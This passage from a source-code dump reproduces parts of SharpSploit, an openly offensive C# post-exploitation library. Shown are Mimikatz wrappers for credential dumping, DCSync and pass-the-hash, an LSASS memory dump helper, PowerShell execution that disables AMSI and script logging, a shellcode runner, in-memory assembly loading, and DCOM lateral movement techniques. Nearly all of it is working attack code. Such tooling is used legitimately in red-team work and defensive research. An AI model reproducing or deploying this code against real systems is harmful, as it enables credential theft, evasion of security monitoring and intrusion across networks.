lsadump::secrets")`. (Requires Admin) 107 | /// 108 | /// Mimikatz output. 109 | public static string LsaSecrets() 110 | { 111 | return Command("privilege::debug lsadump::secrets"); 112 | } 113 | 114 | /// 115 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve Domain 116 | /// Cached Credentials hashes from registry. Equates to `Command("privilege::debug lsadump::cache")`. 117 | /// (Requires Admin) 118 | /// 119 | /// Mimikatz output. 120 | public static string LsaCache() 121 | { 122 | return Command("privilege::debug lsadump::cache"); 123 | } 124 | 125 | /// 126 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve Wdigest 127 | /// credentials from registry. Equates to `Command("sekurlsa::wdigest")`. 128 | /// 129 | /// Mimikatz output. 
130 | public static string Wdigest() 131 | { 132 | return Command("sekurlsa::wdigest"); 133 | } 134 | 135 | /// 136 | /// Loads the Mimikatz PE with `PE.Load()` and executes each of the builtin local commands (not DCSync). (Requires Admin) 137 | /// 138 | /// Mimikatz output. 139 | public static string All() 140 | { 141 | StringBuilder builder = new StringBuilder(); 142 | builder.AppendLine(LogonPasswords()); 143 | builder.AppendLine(SamDump()); 144 | builder.AppendLine(LsaSecrets()); 145 | builder.AppendLine(LsaCache()); 146 | builder.AppendLine(Wdigest()); 147 | return builder.ToString(); 148 | } 149 | 150 | /// 151 | /// Loads the Mimikatz PE with `PE.Load()` and executes the "dcsync" module to retrieve the NTLM hash of a specified (or all) Domain user. (Requires Domain Admin) 152 | /// 153 | /// Username to retrieve NTLM hash for. "All" for all domain users. 154 | /// Optionally specify an alternative fully qualified domain name. Default is current domain. 155 | /// Optionally specify a specific Domain Controller to target for the dcsync. 156 | /// The NTLM hash of the target user(s). 157 | public static string DCSync(string user, string FQDN = null, string DC = null) 158 | { 159 | string command = "lsadump::dcsync"; 160 | if (user.ToLower() == "all") 161 | { 162 | command += " /all"; 163 | } 164 | else 165 | { 166 | command += " /user:" + user; 167 | } 168 | if (FQDN != null) 169 | { 170 | command += " /domain:" + FQDN; 171 | } 172 | else 173 | { 174 | command += " /domain:" + IPGlobalProperties.GetIPGlobalProperties().DomainName; 175 | } 176 | if (DC != null) 177 | { 178 | command += " /dc:" + DC; 179 | } 180 | return Command(command); 181 | } 182 | 183 | /// 184 | /// Loads the Mimikatz PE with `PE.Load()` and executes the "pth" module to start a new process 185 | /// as a user using an NTLM password hash for authentication. 186 | /// 187 | /// Username to authenticate as. 188 | /// NTLM hash to authenticate the user. 
189 | /// Optionally specify an alternative fully qualified domain name. Default is current domain. 190 | /// The command to execute as the specified user. 191 | /// 192 | public static string PassTheHash(string user, string NTLM, string FQDN = null, string run = "cmd.exe") 193 | { 194 | string command = "sekurlsa::pth"; 195 | command += " /user:" + user; 196 | if (FQDN != null) 197 | { 198 | command += " /domain:" + FQDN; 199 | } 200 | else 201 | { 202 | command += " /domain:" + IPGlobalProperties.GetIPGlobalProperties().DomainName; 203 | } 204 | command += " /ntlm:" + NTLM; 205 | command += " /run:" + run; 206 | return Command(command); 207 | } 208 | } 209 | } 210 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Enumeration/Host.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Diagnostics; 8 | using System.Collections.Generic; 9 | using Microsoft.Win32; 10 | 11 | using SharpSploit.Generic; 12 | 13 | namespace SharpSploit.Enumeration 14 | { 15 | /// 16 | /// Host is a library for local host enumeration. 17 | /// 18 | public class Host 19 | { 20 | /// 21 | /// Gets a list of running processes on the system. 22 | /// 23 | /// List of ProcessResults. 24 | public static SharpSploitResultList GetProcessList() 25 | { 26 | Process[] processes = Process.GetProcesses(); 27 | SharpSploitResultList results = new SharpSploitResultList(); 28 | foreach (Process process in processes) 29 | { 30 | results.Add(new ProcessResult(process.Id, 0, process.ProcessName)); 31 | } 32 | return results; 33 | } 34 | 35 | /// 36 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 37 | /// if dumping the LSASS process. 
(Requires Admin) 38 | /// 39 | /// Process ID of the process to generate a minidump for. 40 | /// Path to write output file in. Defaults to the current directory. 41 | /// Filename to ouput the minidump to. 42 | /// 43 | /// Authored by Justin Bui (@youslydawg). 44 | /// 45 | public static void CreateProcessDump(int processId, string outputPath = "", string outputFileName = "") 46 | { 47 | CreateProcessDump(Process.GetProcessById(processId), outputPath, outputFileName); 48 | } 49 | 50 | /// 51 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 52 | /// if dumping the LSASS process. (Requires Admin) 53 | /// 54 | /// Name of the process to generate a minidump for. 55 | /// Path to write output file in. Defaults to the current directory. 56 | /// Filename to ouput the minidump to. 57 | /// 58 | /// Authored by Justin Bui (@youslydawg). 59 | /// 60 | public static void CreateProcessDump(string processName = "lsass", string outputPath = "", string outputFileName = "") 61 | { 62 | if (processName.EndsWith(".exe")) 63 | { 64 | processName = processName.Substring(0, processName.Length - 4); 65 | } 66 | Process[] process_list = Process.GetProcessesByName(processName); 67 | if (process_list.Length > 0) 68 | { 69 | CreateProcessDump(process_list[0], outputPath, outputFileName); 70 | } 71 | } 72 | 73 | /// 74 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 75 | /// if dumping the LSASS process. (Requires Admin) 76 | /// 77 | /// Process to generate a minidump for. 78 | /// Path to write output file in. Defaults to the current directory. 79 | /// Filename to ouput the minidump to. 80 | /// 81 | /// Authored by Justin Bui (@youslydawg). 
82 | /// 83 | public static void CreateProcessDump(Process process, string outputPath = "", string outputFileName = "") 84 | { 85 | if (outputPath == "" || outputPath == null) 86 | { 87 | outputPath = GetCurrentDirectory(); 88 | } 89 | if (outputFileName == "" || outputFileName == null) 90 | { 91 | outputFileName = process.ProcessName + "_" + process.Id + ".dmp"; 92 | } 93 | 94 | string fullPath = Path.Combine(outputPath, outputFileName); 95 | FileStream fileStream = File.Create(fullPath); 96 | bool success = false; 97 | try 98 | { 99 | success = Execution.Win32.Dbghelp.MiniDumpWriteDump(process.Handle, (uint)process.Id, fileStream.SafeFileHandle, Execution.Win32.Dbghelp.MINIDUMP_TYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 100 | } 101 | catch (System.ComponentModel.Win32Exception e) 102 | { 103 | Console.Error.WriteLine(e.Message); 104 | } 105 | 106 | fileStream.Close(); 107 | if (!success) 108 | { 109 | File.Delete(fullPath); 110 | } 111 | } 112 | 113 | /// 114 | /// Gets the hostname of the system. 115 | /// 116 | /// Hostname of the system. 117 | public static string GetHostname() 118 | { 119 | return Environment.MachineName; 120 | } 121 | 122 | /// 123 | /// Gets the Domain name and username of the current logged on user. 124 | /// 125 | /// Current username. 126 | public static string GetUsername() 127 | { 128 | return Environment.UserDomainName + "\\" + Environment.UserName; 129 | } 130 | 131 | /// 132 | /// Gets the full path of the current working directory. 133 | /// 134 | /// Current working directory. 135 | public static string GetCurrentDirectory() 136 | { 137 | return Directory.GetCurrentDirectory(); 138 | } 139 | 140 | /// 141 | /// Gets a directory listing of the current working directory. 142 | /// 143 | /// List of FileSystemEntryResults. 
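public static SharpSploitResultList<FileSystemEntryResult> GetDirectoryListing()
{
    // Directories are added first, then files; both come from the current working directory.
    SharpSploitResultList<FileSystemEntryResult> results = new SharpSploitResultList<FileSystemEntryResult>();
    string currentDirectory = GetCurrentDirectory();
    foreach (string dir in Directory.GetDirectories(currentDirectory))
    {
        results.Add(new FileSystemEntryResult(dir));
    }
    foreach (string file in Directory.GetFiles(currentDirectory))
    {
        results.Add(new FileSystemEntryResult(file));
    }
    return results;
}

/// <summary>
/// Changes the current directory by appending a specified string to the current working directory.
/// </summary>
/// <param name="AppendDirectory">String to append to the current directory.</param>
/// <remarks>
/// The new path is built by plain concatenation with a backslash, so an absolute
/// <paramref name="AppendDirectory"/> is still appended to the current directory rather than replacing it.
/// </remarks>
public static void ChangeCurrentDirectory(string AppendDirectory)
{
    Directory.SetCurrentDirectory(GetCurrentDirectory() + "\\" + AppendDirectory);
}

/// <summary>
/// Reads a value stored in registry.
/// </summary>
/// <param name="RegPath">The full path to the registry value to be read.</param>
/// <returns>The value as a string, or null if it could not be read.</returns>
public static string RegistryRead(string RegPath)
{
    // Split at the LAST separator. Searching for the first occurrence of the value name
    // picks the wrong key when the name also appears earlier in the path
    // (e.g. "...\Run\Run"), and yields an empty key when the path ends with a separator.
    // The key name keeps its trailing separator, as it did before.
    int lastSeparator = RegPath.LastIndexOf(Path.DirectorySeparatorChar);
    string keyName = RegPath.Substring(0, lastSeparator + 1);
    string valueName = RegPath.Substring(lastSeparator + 1);
    return RegistryRead(keyName, valueName);
}

/// <summary>
/// Reads a value stored in registry.
/// </summary>
/// <param name="RegKey">The RegistryKey to read from.</param>
/// <param name="RegValue">The name of name/value pair to read from in the RegistryKey.</param>
/// <returns>
/// The value converted with ToString(), or null when nothing was returned or the read threw.
/// Failures are reported on standard error rather than propagated.
/// </returns>
public static string RegistryRead(string RegKey, string RegValue)
{
    try
    {
        object reg = Registry.GetValue(RegKey, RegValue, null);
        return reg == null ? null : reg.ToString();
    }
    catch (Exception e)
    {
        Console.Error.WriteLine("Registry read exception: " + e.Message);
        return null;
    }
}

///
/// Writes a value in the registry.
///
/// The full path to the registry value to be written to.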
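/// The value to write to the registry key.
///
public static bool RegistryWrite(string RegPath, object Value)
{
    // Split at the LAST separator. Searching for the first occurrence of the value name
    // picks the wrong key when the name also appears earlier in the path, which for a
    // write means the data lands under a different key than the caller named.
    // The key name keeps its trailing separator, as it did before.
    int lastSeparator = RegPath.LastIndexOf(Path.DirectorySeparatorChar);
    string keyName = RegPath.Substring(0, lastSeparator + 1);
    string valueName = RegPath.Substring(lastSeparator + 1);
    return RegistryWrite(keyName, valueName, Value);
}

/// <summary>
/// Writes a value in the registry.
/// </summary>
/// <param name="RegKey">The RegistryKey to write to.</param>
/// <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
/// <param name="Value">The value to write to the registry key.</param>
/// <returns>
/// True if the write did not throw, false otherwise. Failures are reported on
/// standard error rather than propagated.
/// </returns>
public static bool RegistryWrite(string RegKey, string RegValue, object Value)
{
    try
    {
        Registry.SetValue(RegKey, RegValue, Value);
        return true;
    }
    catch (Exception e)
    {
        Console.Error.WriteLine("Registry write exception: " + e.Message);
        return false;
    }
}

/// <summary>
/// ProcessResult represents a running process, used with the GetProcessList() function.
/// </summary>
/// <remarks>
/// GetProcessList() in this file always passes 0 for <see cref="Ppid"/>, so the parent
/// process id column carries no information for results produced by that method.
/// </remarks>
public sealed class ProcessResult : SharpSploitResult
{
    // Process id.
    public int Pid { get; } = 0;
    // Parent process id.
    public int Ppid { get; } = 0;
    // Process name.
    public string Name { get; } = "";

    // Columns in display order: Pid, Ppid, Name. A new list is built on every access.
    protected internal override IList<SharpSploitResultProperty> ResultProperties
    {
        get
        {
            return new List<SharpSploitResultProperty>
            {
                new SharpSploitResultProperty
                {
                    Name = "Pid",
                    Value = this.Pid
                },
                new SharpSploitResultProperty
                {
                    Name = "Ppid",
                    Value = this.Ppid
                },
                new SharpSploitResultProperty
                {
                    Name = "Name",
                    Value = this.Name
                }
            };
        }
    }

    public ProcessResult(int Pid = 0, int Ppid = 0, string Name = "")
    {
        this.Pid = Pid;
        this.Ppid = Ppid;
        this.Name = Name;
    }
}

///
/// FileSystemEntryResult represents a file on disk, used with the GetDirectoryListing() function.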
282 | /// 283 | public sealed class FileSystemEntryResult : SharpSploitResult 284 | { 285 | public string Name { get; } = ""; 286 | protected internal override IList ResultProperties 287 | { 288 | get 289 | { 290 | return new List 291 | { 292 | new SharpSploitResultProperty 293 | { 294 | Name = "Name", 295 | Value = this.Name 296 | } 297 | }; 298 | } 299 | } 300 | 301 | public FileSystemEntryResult(string Name = "") 302 | { 303 | this.Name = Name; 304 | } 305 | } 306 | } 307 | } 308 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Execution/Assembly.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using Reflect = System.Reflection; 7 | 8 | using SharpSploit.Generic; 9 | 10 | namespace SharpSploit.Execution 11 | { 12 | /// 13 | /// Assembly is a library for loading .NET assemblies and executing methods contained within them. 14 | /// 15 | public class Assembly 16 | { 17 | /// 18 | /// Loads a specified .NET assembly byte array and executes a specified method within a 19 | /// specified type with specified parameters. 20 | /// 21 | /// The .NET assembly byte array. 22 | /// The name of the type that contains the method to execute. 23 | /// The name of the method to execute. 24 | /// The parameters to pass to the method. 25 | /// GenericObjectResult of the method. 26 | public static GenericObjectResult AssemblyExecute(byte[] AssemblyBytes, String TypeName = "", String MethodName = "Execute", Object[] Parameters = default(Object[])) 27 | { 28 | Reflect.Assembly assembly = Load(AssemblyBytes); 29 | Type type = TypeName == "" ? assembly.GetTypes()[0] : assembly.GetType(TypeName); 30 | Reflect.MethodInfo method = MethodName == "" ? 
type.GetMethods()[0] : type.GetMethod(MethodName); 31 | var results = method.Invoke(null, Parameters); 32 | return new GenericObjectResult(results); 33 | } 34 | 35 | /// 36 | /// Loads a specified base64-encoded .NET assembly and executes a specified method within a 37 | /// specified type with specified parameters. 38 | /// 39 | /// The base64-encoded .NET assembly byte array. 40 | /// The name of the type that contains the method to execute. 41 | /// The name of the method to execute. 42 | /// The parameters to pass to the method. 43 | /// GenericObjectResult of the method. 44 | public static GenericObjectResult AssemblyExecute(String EncodedAssembly, String TypeName = "", String MethodName = "Execute", Object[] Parameters = default(Object[])) 45 | { 46 | return AssemblyExecute(Convert.FromBase64String(EncodedAssembly)); 47 | } 48 | 49 | /// 50 | /// Loads a specified .NET assembly byte array. 51 | /// 52 | /// The .NET assembly byte array. 53 | /// Loaded assembly. 54 | public static Reflect.Assembly Load(byte[] AssemblyBytes) 55 | { 56 | return Reflect.Assembly.Load(AssemblyBytes); 57 | } 58 | 59 | /// 60 | /// Loads a specified .NET assembly byte array. 61 | /// 62 | /// The base64-encoded .NET assembly byte array. 63 | /// Loaded assembly. 
64 | public static Reflect.Assembly Load(string EncodedAssembly) 65 | { 66 | return Reflect.Assembly.Load(Convert.FromBase64String(EncodedAssembly)); 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Execution/Shell.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Diagnostics; 9 | using System.Management.Automation; 10 | 11 | namespace SharpSploit.Execution 12 | { 13 | /// 14 | /// Shell is a library for executing shell commands. 15 | /// 16 | public class Shell 17 | { 18 | /// 19 | /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses 20 | /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging). 21 | /// 22 | /// PowerShell code to execute. 23 | /// Switch. If true, appends Out-String to the PowerShellCode to execute. 24 | /// Switch. If true, bypasses ScriptBlock and Module logging. 25 | /// Switch. If true, bypasses AMSI. 26 | /// Output of executed PowerShell. 27 | /// 28 | /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module 29 | /// logging bypass goes to Lee Christensen (@_tifkin). 
30 | /// 31 | public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true) 32 | { 33 | if (PowerShellCode == null || PowerShellCode == "") return ""; 34 | 35 | using (PowerShell ps = PowerShell.Create()) 36 | { 37 | BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; 38 | if (BypassLogging) 39 | { 40 | var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); 41 | if (PSEtwLogProvider != null) 42 | { 43 | var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); 44 | var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); 45 | EtwProvider.SetValue(null, EventProvider); 46 | } 47 | } 48 | if (BypassAmsi) 49 | { 50 | var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); 51 | if (amsiUtils != null) 52 | { 53 | amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); 54 | } 55 | } 56 | ps.AddScript(PowerShellCode); 57 | if (OutString) { ps.AddCommand("Out-String"); } 58 | var results = ps.Invoke(); 59 | string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray()); 60 | ps.Commands.Clear(); 61 | return output; 62 | } 63 | } 64 | 65 | /// 66 | /// Executes a specified Shell command, optionally with an alternative username and password. 67 | /// Equates to `ShellExecuteWithPath(ShellCommand, "C:\\WINDOWS\\System32")`. 68 | /// 69 | /// The ShellCommand to execute, including any arguments. 70 | /// Optional alternative username to execute ShellCommand as. 71 | /// Optional alternative Domain of the username to execute ShellCommand as. 72 | /// Optional password to authenticate the username to execute the ShellCommand as. 73 | /// Ouput of the ShellCommand. 
74 | public static string ShellExecute(string ShellCommand, string Username = "", string Domain = "", string Password = "") 75 | { 76 | return ShellExecuteWithPath(ShellCommand, "C:\\WINDOWS\\System32\\", Username, Domain, Password); 77 | } 78 | 79 | /// 80 | /// Executes a specified Shell command from a specified directory, optionally with an alternative username and password. 81 | /// 82 | /// The ShellCommand to execute, including any arguments. 83 | /// The Path of the directory from which to execute the ShellCommand. 84 | /// Optional alternative username to execute ShellCommand as. 85 | /// Optional alternative Domain of the username to execute ShellCommand as. 86 | /// Optional password to authenticate the username to execute the ShellCommand as. 87 | /// Output of the ShellCommand. 88 | public static string ShellExecuteWithPath(string ShellCommand, string Path, string Username = "", string Domain = "", string Password = "") 89 | { 90 | if (ShellCommand == null || ShellCommand == "") return ""; 91 | 92 | string ShellCommandName = ShellCommand.Split(' ')[0]; 93 | string ShellCommandArguments = ""; 94 | if (ShellCommand.Contains(" ")) 95 | { 96 | ShellCommandArguments = ShellCommand.Replace(ShellCommandName + " ", ""); 97 | } 98 | 99 | Process shellProcess = new Process(); 100 | if (Username != "") 101 | { 102 | shellProcess.StartInfo.UserName = Username; 103 | shellProcess.StartInfo.Domain = Domain; 104 | System.Security.SecureString SecurePassword = new System.Security.SecureString(); 105 | foreach (char c in Password) 106 | { 107 | SecurePassword.AppendChar(c); 108 | } 109 | shellProcess.StartInfo.Password = SecurePassword; 110 | } 111 | shellProcess.StartInfo.FileName = ShellCommandName; 112 | shellProcess.StartInfo.Arguments = ShellCommandArguments; 113 | shellProcess.StartInfo.WorkingDirectory = Path; 114 | shellProcess.StartInfo.UseShellExecute = false; 115 | shellProcess.StartInfo.CreateNoWindow = true; 116 | 
shellProcess.StartInfo.RedirectStandardOutput = true; 117 | shellProcess.Start(); 118 | 119 | string output = shellProcess.StandardOutput.ReadToEnd(); 120 | shellProcess.WaitForExit(); 121 | 122 | return output; 123 | } 124 | } 125 | } -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Execution/ShellCode.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace SharpSploit.Execution 9 | { 10 | /// 11 | /// ShellCode includes a method for executing shellcode. 12 | /// 13 | public class ShellCode 14 | { 15 | [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)] 16 | private delegate Int32 Run(); 17 | 18 | /// 19 | /// Executes a specified ShellCode byte array by copying it to pinned memory, modifying the memory 20 | /// permissions with VirtualProtect(), and executing using a delegate. 21 | /// 22 | /// ShellCode byte array to execute. 23 | /// Boolean. True if execution succeeds, false otherwise. 24 | /// Based upon code written by Matt Nelson (@enigma0x3) and Matt Graeber (@mattifestation). 
25 | public static bool ShellCodeExecute(byte[] ShellCode) 26 | { 27 | try 28 | { 29 | GCHandle pinnedArray = GCHandle.Alloc(ShellCode, GCHandleType.Pinned); 30 | IntPtr ptr = pinnedArray.AddrOfPinnedObject(); 31 | Marshal.Copy(ShellCode, 0, ptr, ShellCode.Length); 32 | 33 | uint flOldProtect = 0; 34 | if (!Win32.Kernel32.VirtualProtect(ptr, (UIntPtr)ShellCode.Length, 0x40, out flOldProtect)) 35 | { 36 | return false; 37 | } 38 | Run del = (Run)Marshal.GetDelegateForFunctionPointer(ptr, typeof(Run)); 39 | del(); 40 | return true; 41 | } 42 | catch (Exception e) 43 | { 44 | Console.Error.WriteLine("ShellCodeExecute exception: " + e.Message); 45 | } 46 | return false; 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Generic/Generic.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Text; 7 | using System.Linq; 8 | using System.Collections.Generic; 9 | using System.Collections; 10 | 11 | namespace SharpSploit.Generic 12 | { 13 | /// 14 | /// GenericObjectResult for listing objects whose type is unknown at compile time. 15 | /// 16 | public sealed class GenericObjectResult : SharpSploitResult 17 | { 18 | public object Result { get; } 19 | protected internal override IList ResultProperties 20 | { 21 | get 22 | { 23 | return new List 24 | { 25 | new SharpSploitResultProperty 26 | { 27 | Name = this.Result.GetType().Name, 28 | Value = this.Result 29 | } 30 | }; 31 | } 32 | } 33 | 34 | public GenericObjectResult(object Result) 35 | { 36 | this.Result = Result; 37 | } 38 | } 39 | 40 | /// 41 | /// SharpSploitResultList extends the IList interface for SharpSploitResults to easily 42 | /// format a list of results from various SharpSploit functions. 
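///
///
public class SharpSploitResultList<T> : IList<T> where T : SharpSploitResult
{
    // Backing store; every IList<T> member below forwards to it.
    private List<T> Results { get; } = new List<T>();

    public int Count => Results.Count;
    public bool IsReadOnly => ((IList<T>)Results).IsReadOnly;

    // Number of spaces between two columns in the formatted output.
    private const int PROPERTY_SPACE = 3;

    /// <summary>
    /// Formats a SharpSploitResultList to a string. Currently returns the same text as ToString().
    /// </summary>
    /// <returns>string</returns>
    public string FormatList()
    {
        return this.ToString();
    }

    // Placeholder: not implemented, always returns an empty string.
    private string FormatTable()
    {
        // TODO
        return "";
    }

    /// <summary>
    /// Formats a SharpSploitResultList as a string. Overrides ToString() for convenience.
    /// </summary>
    /// <returns>
    /// A header row with the property names of the first result, a row of dashes, then one row
    /// per result. An empty list produces an empty string.
    /// </returns>
    public override string ToString()
    {
        if (this.Results.Count == 0)
        {
            return "";
        }

        // ResultProperties may build a new list on each access, so read it once per result.
        IList<SharpSploitResultProperty> columns = this.Results[0].ResultProperties;
        StringBuilder output = new StringBuilder();
        StringBuilder underline = new StringBuilder();
        for (int i = 0; i < columns.Count; i++)
        {
            output.Append(columns[i].Name);
            underline.Append(new String('-', columns[i].Name.Length));
            if (i != columns.Count - 1)
            {
                output.Append(new String(' ', PROPERTY_SPACE));
                underline.Append(new String(' ', PROPERTY_SPACE));
            }
        }
        output.AppendLine();
        output.AppendLine(underline.ToString());

        foreach (SharpSploitResult result in this.Results)
        {
            IList<SharpSploitResultProperty> properties = result.ResultProperties;
            for (int i = 0; i < properties.Count; i++)
            {
                SharpSploitResultProperty property = properties[i];
                // A null Value (or a ToString() that returns null) is rendered as an empty
                // cell instead of throwing and losing the whole listing.
                string valueString = property.Value?.ToString() ?? "";
                output.Append(valueString);
                if (i != properties.Count - 1)
                {
                    // Pad to the width of the column name plus the gap; a value wider than
                    // that still gets one space, so later columns shift right.
                    output.Append(new String(' ', Math.Max(1, property.Name.Length + PROPERTY_SPACE - valueString.Length)));
                }
            }
            output.AppendLine();
        }
        return output.ToString();
    }

    public T this[int index] { get => Results[index]; set => Results[index] = value; }

    public IEnumerator<T> GetEnumerator()
    {
        return Results.GetEnumerator();
    }

    IEnumerator IEnumerable.GetEnumerator()
    {
        return Results.GetEnumerator();
    }

    public int IndexOf(T item)
    {
        return Results.IndexOf(item);
    }

    public void Add(T t)
    {
        Results.Add(t);
    }

    public void AddRange(IEnumerable<T> range)
    {
        Results.AddRange(range);
    }

    public void Insert(int index, T item)
    {
        Results.Insert(index, item);
    }

    public void RemoveAt(int index)
    {
        Results.RemoveAt(index);
    }

    public void Clear()
    {
        Results.Clear();
    }

    public bool Contains(T item)
    {
        return Results.Contains(item);
    }

    public void CopyTo(T[] array, int arrayIndex)
    {
        Results.CopyTo(array, arrayIndex);
    }

    public bool Remove(T item)
    {
        return Results.Remove(item);
    }
}

/// <summary>
/// Abstract class that represents a result from a SharpSploit function.
/// </summary>
public abstract class SharpSploitResult
{
    // Name/value pairs used by SharpSploitResultList.ToString() to render one row.
    protected internal abstract IList<SharpSploitResultProperty> ResultProperties { get; }
}

///
/// SharpSploitResultProperty represents a property that is a member of a SharpSploitResult's ResultProperties.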
179 | /// 180 | public class SharpSploitResultProperty 181 | { 182 | public string Name { get; set; } 183 | public object Value { get; set; } 184 | } 185 | } 186 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/LateralMovement/DCOM.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpSploit.LateralMovement 11 | { 12 | /// 13 | /// DCOM is a class for executing DCOM lateral movement techniques. 14 | /// 15 | public class DCOM 16 | { 17 | /// 18 | /// Execute a process on a remote system using various DCOM methods. 19 | /// 20 | /// ComputerName of remote system to execute process. 21 | /// Command to execute on remote system. 22 | /// 23 | /// 24 | /// DCOM execution method to use. Defaults to MMC20.Application. 25 | /// Bool. True if execution succeeds, false otherwise. 26 | /// 27 | /// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). 
This is 28 | /// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available 29 | /// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1 30 | /// 31 | public static bool DCOMExecute(string ComputerName, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application) 32 | { 33 | try 34 | { 35 | if (Method == DCOMMethod.MMC20_Application) 36 | { 37 | Type ComType = Type.GetTypeFromProgID("MMC20.Application", ComputerName); 38 | object RemoteComObject = Activator.CreateInstance(ComType); 39 | 40 | object Document = RemoteComObject.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, RemoteComObject, null); 41 | object ActiveView = Document.GetType().InvokeMember("ActiveView", BindingFlags.GetProperty, null, Document, null); 42 | ActiveView.GetType().InvokeMember("ExecuteShellCommand", BindingFlags.InvokeMethod, null, ActiveView, new object[] { Command, Directory, Parameters, "7" }); 43 | } 44 | else if (Method == DCOMMethod.ShellWindows) 45 | { 46 | Type ComType = Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName); 47 | object RemoteComObject = Activator.CreateInstance(ComType); 48 | 49 | object Item = RemoteComObject.GetType().InvokeMember("Item", BindingFlags.InvokeMethod, null, RemoteComObject, new object[] { }); 50 | object Document = Item.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, Item, null); 51 | object Application = Document.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, Document, null); 52 | Application.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, Application, new object[] { Command, Parameters, Directory, null, 0 }); 53 | } 54 | else if (Method == DCOMMethod.ShellBrowserWindow) 55 | { 56 | Type ComType = Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName); 57 | object RemoteComObject = Activator.CreateInstance(ComType); 58 | 59 | object Document = 
RemoteComObject.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, RemoteComObject, null); 60 | object Application = Document.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, Document, null); 61 | Application.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, Application, new object[] { Command, Parameters, Directory, null, 0 }); 62 | } 63 | else if (Method == DCOMMethod.ExcelDDE) 64 | { 65 | Type ComType = Type.GetTypeFromProgID("Excel.Application", ComputerName); 66 | object RemoteComObject = Activator.CreateInstance(ComType); 67 | RemoteComObject.GetType().InvokeMember("DisplayAlerts", BindingFlags.SetProperty, null, RemoteComObject, new object[] { false }); 68 | RemoteComObject.GetType().InvokeMember("DDEInitiate", BindingFlags.InvokeMethod, null, RemoteComObject, new object[] { Command, Parameters }); 69 | } 70 | return true; 71 | } 72 | catch (Exception e) 73 | { 74 | Console.Error.WriteLine("DCOM Failed: " + e.Message); 75 | } 76 | return false; 77 | } 78 | 79 | /// 80 | /// Execute a process on a remote system using various DCOM methods. 81 | /// 82 | /// ComputerNames of remote systems to execute process. 83 | /// Command to execute on remote system. 84 | /// 85 | /// 86 | /// DCOM execution method to use. Defaults to MMC20.Application. 87 | /// Bool. True if execution succeeds, false otherwise. 88 | /// 89 | /// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). 
